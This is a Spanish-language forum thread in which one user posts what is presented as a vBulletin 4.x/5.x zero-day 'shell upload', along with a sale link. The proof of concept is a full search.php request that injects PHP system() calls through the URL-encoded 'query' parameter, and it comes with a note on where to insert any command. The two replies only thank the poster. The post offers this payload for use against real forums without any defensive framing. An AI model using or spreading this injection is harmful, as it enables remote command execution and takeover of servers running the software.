Página 1 de 1

vBulletin v4.x.x and 5.х.x Shell Upload (0day)

Publicado: 21 Abr 2014, 01:54
por jorge705
link de la venta: [Enlace externo eliminado para invitados]

EL POC:

Código: Seleccionar todo

search.php?ajax=0&beforeafter=after&childforums=1&exactname=1&exclude=&forumchoice=&nocache=0&query=%24%7b%40system('pwd')%7d&quicksearch=0&replyless=0&replylimit=0&saveprefs=1&searchdate=0&searchthreadid=0&searchtype=1&searchuser=1&showposts=0&sortby=rank&sortorder=descending&starteronly=0&tag=17&titleonly=0&userid=0
# "query" param
# php code to inject : ${@system('put command here')}


Re: vBulletin v4.x.x and 5.х.x Shell Upload (0day)

Publicado: 21 Abr 2014, 02:47
por Blau
Gracias por esto, es muy útil

Re: vBulletin v4.x.x and 5.х.x Shell Upload (0day)

Publicado: 27 Sep 2014, 18:33
por its-ownz
Gracias